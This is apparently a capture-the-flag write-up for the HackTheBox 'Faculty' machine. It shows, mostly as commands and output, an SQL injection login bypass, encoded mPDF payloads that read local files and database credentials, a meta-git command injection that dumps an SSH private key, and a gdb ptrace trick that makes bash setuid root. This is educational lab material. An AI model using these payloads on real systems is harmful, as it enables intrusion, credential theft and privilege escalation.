Faculty - [HTB]
![Cover Image for Faculty - [HTB]](/assets/images/blog/Faculty-htb/Faculty.png)
Table of Contents
Introduction
Faculty is a medium Linux machine from HackTheBox where the attacker will have to exploit a simple SQL injection and then exploit a vulnerability on the library mPDF in order to retrieve the web page's source code with the purpose of obtaining the database credentials. Then, to escalate privileges, you need to exploit a vulnerability on meta-git. Finally, the GDB binary has the sys_ptrace capability, which can be used to become root.
Enumeration
As always, let's start scanning all opened ports in the box with Nmap.
# Nmap 7.92 scan initiated Tue Aug 2 12:06:20 2022 as: nmap -v -sS -p- -n -T4 -oN AllPorts.txt 10.10.11.169
Nmap scan report for 10.10.11.169
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Aug 2 12:08:20 2022 -- 1 IP address (1 host up) scanned in 120.65 secondsThen, we continue with a deeper scan of every opened port, getting more information about each service.
kali@kali:~/Documents/HTB/Faculty$ portsDepth 22,80 10.10.11.169
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-02 12:09 EDT
Nmap scan report for 10.10.11.169
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e9:41:8c:e5:54:4d:6f:14:98:76:16:e7:29:2d:02:16 (RSA)
| 256 43:75:10:3e:cb:78:e9:52:0e:eb:cf:7f:fd:f6:6d:3d (ECDSA)
|_ 256 c1:1c:af:76:2b:56:e8:b3:b8:8a:e9:69:73:7b:e6:f5 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://faculty.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.72 secondsEnumerating directories with ffuf the following results are obtained.
kali@kali:~/Documents/HTB/Faculty$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e /,.php,.html,.txt -of md -o ffuz.txt -t 60 -u http://faculty.htb/FUZZ -fs 12193
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1
________________________________________________
:: Method : GET
:: URL : http://faculty.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : / .php .html .txt
:: Output file : ffuz.txt
:: File format : md
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 60
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 12193
________________________________________________
login.php [Status: 200, Size: 4860, Words: 270, Lines: 132]
header.php [Status: 200, Size: 2871, Words: 155, Lines: 48]
admin [Status: 301, Size: 178, Words: 6, Lines: 8]
admin/ [Status: 302, Size: 13897, Words: 2637, Lines: 421]
topbar.php [Status: 200, Size: 1206, Words: 199, Lines: 37]Inside the amdin/ folder there is a login panel.
It is possible to bypass the authentication by writing ' or '1='1' -- -# as username and whatever value as a password. Login us as Administrator.
Furthermore, in the "Faculty List" section there is a download PDF button.
Clicking on download, we obtain the following request.
Once the information is decoded, has the following HTML output.
<h1><a name="top"></a>faculty.htb</h1>
<h2>Faculties</h2>
<table>
<thead>
<tr>
<th class="text-center">ID</th>
<th class="text-center">Name</th>
<th class="text-center">Email</th>
<th class="text-center">Contact</th>
</tr>
</thead>
<tbody>
<tr>
<td class="text-center">85662050</td>
<td class="text-center"><b>Blake, Claire G</b></td>
<td class="text-center"><small><b>cblake@faculty.htb</b></small></td>
<td class="text-center"><small><b>(763) 450-0121</b></small></td>
</tr>
<tr>
<td class="text-center">30903070</td>
<td class="text-center"><b>James, Eric P</b></td>
<td class="text-center"><small><b>ejames@faculty.htb</b></small></td>
<td class="text-center"><small><b>(702) 368-3689</b></small></td>
</tr>
<tr>
<td class="text-center">63033226</td>
<td class="text-center"><b>Smith, John C</b></td>
<td class="text-center"><small><b>jsmith@faculty.htb</b></small></td>
<td class="text-center"><small><b>(646) 559-9192</b></small></td>
</tr>
</tboby>
</table>Then, the following file is obtained once the request has been forwarded.
Exploitation
Based on the URL, the PDF is generated using the library mPDF for PHP. This library has an issue where an attacker can include files from the system as attachments.
With the following payload, you can extract the file /etc/passwd, obtaining the next users.
# PAYLOAD
JTI1M0NoMSUyNTNFbWFybWV1cyUyNTNDL2gxJTI1M0UlMjUwQSUyNTIwJTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyL2V0Yy9wYXNzd2QlMjUyMiUyNTIwY29udGVudD0lMjUyMi9ldGMvcGFzc3dkJTI1MjIlMjUyMCUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjAvZXRjL3Bhc3N3ZCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=
# USERS
root:x:0:0:root:/root:/bin/bash
gbyolo:x:1000:1000:gbyolo:/home/gbyolo:/bin/bash
developer:x:1001:1002:,,,:/home/developer:/bin/bash
After analysing the login.php code from the web, it is known the existence of the db_connect.php file.
# PAYLOAD
JTI1M0NoMSUyNTNFbWFybWV1cyUyNTNDL2gxJTI1M0UlMjUwQSUyNTIwJTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIybG9naW4ucGhwJTI1MjIlMjUyMGNvbnRlbnQ9JTI1MjJsb2dpbi5waHAlMjUyMiUyNTIwJTI1MjBpY29uPSUyNTIyR3JhcGglMjUyMiUyNTIwdGl0bGU9JTI1MjJBdHRhY2hlZCUyNTIwRmlsZTolMjUyMGxvZ2luLnBocCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=
# login.php
<!DOCTYPE html>
<html lang="en">
<?php
session_start();
include('./db_connect.php');
ob_start();
ob_end_flush();
?>
[...]Again, after analysing that file, it is possible to obtain some credentials.
JTI1M0NoMSUyNTNFbWFybWV1cyUyNTNDL2gxJTI1M0UlMjUwQSUyNTIwJTI1M0Nhbm5vdGF0aW9uJTI1MjBmaWxlPSUyNTIyZGJfY29ubmVjdC5waHAlMjUyMiUyNTIwY29udGVudD0lMjUyMmRiX2Nvbm5lY3QucGhwJTI1MjIlMjUyMCUyNTIwaWNvbj0lMjUyMkdyYXBoJTI1MjIlMjUyMHRpdGxlPSUyNTIyQXR0YWNoZWQlMjUyMEZpbGU6JTI1MjBkYl9jb25uZWN0LnBocCUyNTIyJTI1MjBwb3MteD0lMjUyMjE5NSUyNTIyJTI1MjAvJTI1M0U=
# db_connect.php
<?php
$conn= new mysqli('localhost','sched','Co.met06aci.dly53ro.per','scheduling_db')or die("Could not connect to mysql".mysqli_error($con));The password can be used to get access the machine as the user "gbyolo" through SSH.
kali@kali:~/Documents/HTB/Faculty$ ssh gbyolo@faculty.htb
gbyolo@faculty.htb's password: Co.met06aci.dly53ro.per
gbyolo@faculty:~$ id
uid=1000(gbyolo) gid=1000(gbyolo) groups=1000(gbyolo)Privilege escalation 1
The user gbyolo has permission to execute the node module meta-git as the user "developer".
gbyolo@faculty:~$ sudo -l
[sudo] password for gbyolo:
Matching Defaults entries for gbyolo on faculty:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User gbyolo may run the following commands on faculty:
(developer) /usr/local/bin/meta-gitThis module has an associated vulnerability, allowing arbitrary code execution.
Note: By default, it doesn't work if you are in a directory which the user developer doesn't have access.
gbyolo@faculty:/$ cd /tmp/
gbyolo@faculty:/tmp$ sudo -u developer /usr/local/bin/meta-git clone 'sss || touch /tmp/HACKED'
meta git cloning into 'sss || touch /tmp/HACKED' at HACKED
HACKED:
fatal: repository 'sss' does not exist
HACKED
[...]
gbyolo@faculty:/tmp$ ls -la HACKED
-rw-rw-r-- 1 developer developer 0 Aug 2 19:14 HACKEDTo access the machine as developer, it is necessary to retrieve the developer's SSH private key.
gbyolo@faculty:/tmp$ sudo -u developer /usr/local/bin/meta-git clone 'sss || cat /home/developer/.ssh/id_rsa'
[...]
id_rsa:
fatal: repository 'sss' does not exist
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
Finally, it is possible to obtain the user's flag.
kali@kali:~/Documents/HTB/Faculty$ ssh -i developer_ssh_key developer@faculty.htb
[...]
developer@faculty:~$ cat user.txt
[CENSORED]Privilege Escalation 2
The user is a member of the debug group, allowing it to execute gdb.
developer@faculty:~$ id
uid=1001(developer) gid=1002(developer) groups=1002(developer),1001(debug),1003(faculty)
developer@faculty:~$ ls -la /usr/bin/gdb
-rwxr-x--- 1 root debug 8440200 Dec 8 2021 /usr/bin/gdbFurthermore, enumerating with linpeas, it seems that the gdb binary has the sys_ptrace capability, inspecting any processes.
Files with capabilities (limited to 50): [...]
/usr/bin/gdb = cap_sys_ptrace+e
[...]In order to exploit this weakness, it is needed to be attached a process to process which contains the system function.
After a lot of trial and error, the python3 program is the best candidate to exploit this weakness.
Note: The function system doesn't provide any output, so commands as "id" or "cat" won't show anything.
developer@faculty:~$ ps aux | grep ^root
[...]
root 707 0.0 0.9 26896 18296 ? Ss 20:21 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
[..]
developer@faculty:~$ gdb -p 707
(gdb) call (void)system("chmod u+s /bin/bash")
(gdb) quit
developer@faculty:~$ /bin/bash -p
developer@faculty:~$ /bin/bash -p
bash-5.0# id
uid=1001(developer) gid=1002(developer) euid=0(root) groups=1002(developer),1001(debug),1003(faculty)
bash-5.0# cat /root/root.txt
[CENSORED]